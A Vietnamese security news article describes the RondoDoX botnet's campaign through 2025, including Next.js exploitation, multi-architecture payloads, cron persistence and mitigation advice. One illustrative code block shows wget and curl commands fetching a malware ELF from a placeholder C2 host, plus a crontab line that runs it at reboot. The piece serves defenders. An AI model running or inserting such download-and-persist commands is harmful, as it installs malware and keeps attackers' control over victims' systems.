RondoDoX botnet: Tấn công mạng leo thang cực kỳ nguy hiểm
Một nhóm tác nhân đe dọa tinh vi đã gia tăng chiến dịch tấn công mạng của mình bằng cách khai thác các lỗ hổng mới nhất trong các ứng dụng web và thiết bị Internet of Things (IoT). RondoDoX botnet, được theo dõi thông qua các nhật ký máy chủ chỉ huy và kiểm soát (C2) bị lộ trong suốt chín tháng, từ tháng 3 đến tháng 12 năm 2025, cho thấy một phương pháp tiếp cận không ngừng nhằm xâm phạm hạ tầng doanh nghiệp.
Khái Quát Về Chiến Dịch RondoDoX Botnet
Mã độc này hoạt động thông qua một quy trình lây nhiễm nhiều giai đoạn. Ban đầu, nó quét các hệ thống dễ bị tổn thương, sau đó leo thang để triển khai các công cụ đào tiền ảo (cryptominers) và tải trọng botnet trên nhiều môi trường mạng khác nhau. Chiến dịch này được chia thành ba giai đoạn tấn công riêng biệt, mỗi giai đoạn ngày càng tinh vi hơn.
Các Giai Đoạn Phát Triển Của Cuộc Tấn Công
- Giai đoạn 1 (Ban đầu): Các tác nhân đe dọa thực hiện kiểm thử lỗ hổng thủ công trên nhiều nền tảng mục tiêu.
- Giai đoạn 2 (Tháng 4/2025): Chuyển sang các hoạt động quét tự động hàng ngày, nhắm mục tiêu vào nhiều khung web (web frameworks). Điều này cho thấy sự gia tăng về quy mô và tự động hóa trong các hoạt động trinh sát.
- Giai đoạn 3 (Tháng 7/2025): Các cuộc tấn công leo thang lên tần suất triển khai hàng giờ, thể hiện cam kết của kẻ tấn công đối với việc khai thác liên tục và xâm phạm hạ tầng.
Phát Hiện và Phân Tích Cơ Sở Hạ Tầng Malicious
Các nhà phân tích của CloudSEK đã xác định mã độc thông qua các hoạt động quét định kỳ nhằm tìm kiếm cơ sở hạ tầng độc hại. Phát hiện này đã hé lộ sáu máy chủ chỉ huy và kiểm soát (C2) được xác nhận với thời gian hoạt động chồng lấn. Các nhà nghiên cứu cũng tìm thấy bằng chứng về ít nhất mười biến thể botnet đang được triển khai tích cực trên các hệ thống bị xâm nhập. Nhật ký lệnh từ các máy chủ C2 cung cấp thông tin chi tiết về các mẫu tấn công và cách sử dụng cơ sở hạ tầng trong suốt thời gian diễn ra chiến dịch. Theo CloudSEK, những biến thể này cho thấy khả năng thích ứng và phát triển của RondoDoX botnet.
Cơ Chế Khai Thác Lỗ Hổng và Triển Khai Payload
Sự phát triển đáng báo động nhất xảy ra vào tháng 12 năm 2025, khi các tác nhân đe dọa bắt đầu vũ khí hóa một lỗ hổng nghiêm trọng của Next.js để triển khai các payload React2Shell. Sự chuyển đổi này chứng tỏ khả năng thích ứng nhanh chóng của nhóm tin tặc, nhanh chóng áp dụng các lỗ hổng bảo mật mới được tiết lộ.
Khai Thác Lỗ Hổng Next.js và React2Shell
Chuỗi tấn công bắt đầu bằng việc xác định các máy chủ dễ bị tổn thương thông qua kiểm thử thực thi mã từ xa mù (blind remote code execution testing). Sau đó, các tệp nhị phân ELF (Executable and Linkable Format) được triển khai, có nhiệm vụ tải xuống các payload độc hại từ cơ sở hạ tầng C2 đang hoạt động. Việc khai thác các lỗ hổng trong Next.js Server Actions là một điểm đáng chú ý, vì nó cho phép kẻ tấn công thực thi mã trên máy chủ, một bước quan trọng để giành quyền kiểm soát.
React2Shell là một kỹ thuật khai thác cho phép kẻ tấn công thiết lập một shell điều khiển từ xa trên hệ thống mục tiêu. Điều này biến các máy chủ Next.js dễ bị tổn thương thành các điểm xâm nhập, từ đó kẻ tấn công có thể thực thi các lệnh tùy ý, cài đặt mã độc, hoặc tiến hành các hành động độc hại khác. Đây là một phương pháp hiệu quả để duy trì sự hiện diện và kiểm soát trên các hệ thống đã bị xâm nhập.
Quy Trình Lây Nhiễm Nhiều Giai Đoạn
Cơ chế lây nhiễm của mã độc RondoDoX botnet cho thấy khả năng duy trì quyền kiểm soát và né tránh phát hiện tinh vi. Ngay sau khi được triển khai, botnet thiết lập quyền duy trì thông qua cấu hình cron job trong các tệp hệ thống. Điều này đảm bảo rằng mã độc sẽ tự động khởi chạy lại sau khi hệ thống khởi động hoặc theo một lịch trình định sẵn. Đồng thời, nó chủ động chấm dứt các mã độc cạnh tranh khác để độc quyền tài nguyên hệ thống.
Payload của botnet bao gồm các cryptominer và các framework hỗ trợ được thiết kế để thống trị lâu dài trên các máy chủ bị xâm nhập. Việc này không chỉ tối đa hóa lợi nhuận từ việc đào tiền ảo mà còn củng cố vị thế của botnet trên hệ thống, gây khó khăn cho việc gỡ bỏ.
Cơ Chế Duy Trì Quyền Kiểm Soát và Khả Năng Thích Ứng
Một trong những đặc điểm nổi bật của RondoDoX botnet là khả năng thích ứng và duy trì quyền kiểm soát. Nó được thiết kế để hoạt động hiệu quả trong các môi trường đa dạng, đảm bảo rằng việc triển khai payload luôn thành công.
Hỗ Trợ Đa Kiến Trúc và Cơ Chế Tải Xuống Dự Phòng
Botnet hỗ trợ nhiều kiến trúc bộ xử lý, bao gồm x86, x86_64, MIPS, ARM và PowerPC. Điều này cho phép nó nhắm mục tiêu và lây nhiễm một phổ rộng các thiết bị, từ máy chủ truyền thống đến các thiết bị IoT có kiến trúc ARM hoặc MIPS. Với sự đa dạng về kiến trúc, RondoDoX botnet có thể gây ảnh hưởng đến nhiều loại hình tổ chức và thiết bị.
Để đảm bảo việc phân phối payload thành công trên các môi trường doanh nghiệp không đồng nhất, botnet sử dụng nhiều cơ chế tải xuống dự phòng. Các giao thức được sử dụng bao gồm wget, curl, tftp và ftp. Nếu một phương pháp thất bại, mã độc sẽ tự động chuyển sang phương pháp khác, tăng cường khả năng vượt qua các biện pháp phòng thủ mạng.
# Ví dụ lệnh tải xuống payload (trong trường hợp thực tế sẽ phức tạp hơn)# Sử dụng wgetwget -qO /tmp/payload_elf http://<C2_SERVER_IP>/malware.elf# Sử dụng curlcurl -sSL http://<C2_SERVER_IP>/malware.elf -o /tmp/payload_elf# Thiết lập cron job để duy trì quyền kiểm soát(crontab -l 2>/dev/null; echo "@reboot /tmp/payload_elf >/dev/null 2>&1") | crontab -Chỉ Dẫn Phòng Ngừa và Giảm Thiểu Rủi Ro
Các tổ chức có bộ định tuyến, camera và ứng dụng hướng Internet đang chạy Next.js Server Actions phải đối mặt với rủi ro ngay lập tức. Để bảo vệ khỏi các cuộc tấn công như của RondoDoX botnet, cần áp dụng một chiến lược bảo mật mạng toàn diện và nhiều lớp.
Các Biện Pháp Phòng Vệ Chủ Động
- Phân đoạn mạng (Network Segmentation): Thực hiện phân đoạn mạng để cô lập các hệ thống quan trọng và giới hạn khả năng lây lan của mã độc. Nếu một phân đoạn bị xâm nhập, các phân đoạn khác vẫn được bảo vệ.
- Cập nhật bản vá ngay lập tức: Vá các ứng dụng dễ bị tổn thương ngay lập tức khi có bản vá được phát hành. Đặc biệt chú ý đến các ứng dụng hướng Internet và các thành phần cốt lõi như Next.js.
- Triển khai Tường lửa ứng dụng web (WAF): WAF có thể giúp phát hiện và ngăn chặn các cuộc tấn công khai thác lỗ hổng web, bao gồm cả các cuộc tấn công liên quan đến Next.js Server Actions.
- Giám sát liên tục: Liên tục giám sát việc thực thi quy trình đáng ngờ trong các thư mục tạm thời. Các tệp nhị phân độc hại thường được tải xuống và thực thi từ các vị trí này. Việc giám sát hành vi bất thường là chìa khóa để phát hiện sớm xâm nhập.
Bảo Vệ Hệ Thống Bằng Tường Lửa và Cấu Hình An Toàn
Ngoài các biện pháp trên, việc chặn cơ sở hạ tầng chỉ huy và kiểm soát (C2) đã được xác định tại các tường lửa chu vi (perimeter firewalls) cung cấp một lớp bảo vệ ngắn hạn quan trọng chống lại các nỗ lực khai thác đang diễn ra. Điều này ngăn chặn các hệ thống bị xâm nhập liên lạc với máy chủ C2 để nhận lệnh hoặc tải xuống thêm payload. Các tổ chức nên duy trì danh sách chặn (blocklist) cập nhật các IP và tên miền C2 được biết đến.
# Ví dụ cấu hình tường lửa (iptables trên Linux) để chặn một địa chỉ IP C2iptables -A INPUT -s <C2_SERVER_IP> -j DROPiptables -A OUTPUT -d <C2_SERVER_IP> -j DROP# Ví dụ cấu hình tường lửa (pfSense/OPNsense) để chặn theo dải IP hoặc domain# Tạo alias cho các IP/domains C2 và áp dụng rule chặnViệc rà soát và tăng cường các cấu hình hệ thống cũng đóng vai trò quan trọng trong việc tăng cường an ninh mạng. Kiểm tra các cron job hiện có để đảm bảo không có tác vụ nào đáng ngờ được lên lịch. Hạn chế quyền ghi vào các thư mục hệ thống và thư mục tạm thời có thể ngăn chặn mã độc cài đặt các tệp nhị phân hoặc duy trì quyền kiểm soát. Thường xuyên kiểm tra nhật ký hệ thống để tìm các dấu hiệu hoạt động bất thường hoặc lỗi liên quan đến các dịch vụ mạng.
Cuối cùng, việc duy trì một chương trình vá lỗi mạnh mẽ và đào tạo người dùng về các mối đe dọa mới nhất là rất cần thiết. Đối với các lỗ hổng như của Next.js, việc theo dõi các bản vá bảo mật và áp dụng chúng ngay lập tức là yếu tố then chốt để ngăn chặn các cuộc tấn công mạng.
